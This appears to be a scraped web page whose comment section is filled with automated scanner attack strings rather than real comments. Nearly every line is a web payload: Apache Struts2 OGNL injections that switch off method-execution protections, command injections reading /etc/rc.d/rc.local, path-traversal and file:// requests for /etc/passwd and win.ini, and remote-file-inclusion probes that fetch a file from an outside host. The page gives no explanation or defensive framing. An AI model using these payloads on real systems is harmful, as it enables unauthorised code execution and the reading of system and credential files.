‘+(#context[\”xwork.MethodAccessor.denyMethodExecution\”]=new java.lang.Boolean(false),#_memberAccess[\”allowStaticMethodAccess\”]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+’ 回复
(#context[\”xwork.MethodAccessor.denyMethodExecution\”]=new java.lang.Boolean(false),#_memberAccess[\”allowStaticMethodAccess\”]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh) 回复
(#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh) 回复
%{#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close()} 回复
${#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close()} 回复
‘+(#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+’ 回复
1;cat /etc/rc.d/rc.local;
1′;cat /etc/rc.d/rc.local;’
1″;cat /etc/rc.d/rc.local;”
‘+(#context[\”xwork.MethodAccessor.denyMethodExecution\”]=new java.lang.Boolean(false),#_memberAccess[\”allowStaticMethodAccess\”]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+’
(#context[\”xwork.MethodAccessor.denyMethodExecution\”]=new java.lang.Boolean(false),#_memberAccess[\”allowStaticMethodAccess\”]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)
(#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)
../../../../../../../../../../etc/passwd.php
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local.html
c:/windows/win.ini
我就是随便看看
x||set||x
%{#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close()}
${#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close()}
c:/windows/win.ini.php
http://cirt.net/rfiinc.txt.htm
file:///etc/passwd
../../../../../../../../../../etc/rc.d/rc.local.jpeg
file:///etc/rc.d/rc.local
‘+(#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+’
../../../../../../../../../../etc/passwd.jpeg
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local.php
c:/windows/win.ini.jpeg
http://cirt.net/rfiinc.txt
http://cirt.net/rfiinc.txt.html
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local.htm
c:/windows/win.ini.html
../../../../../../../../../../etc/rc.d/rc.local
../../../../../../../../../../etc/rc.d/rc.local.jpg
file:///etc/passwd.php
file:///etc/rc.d/rc.local.php
c:/windows/win.ini.htm
file:///etc/passwd.html
../../../../../../../../../../etc/rc.d/rc.local.php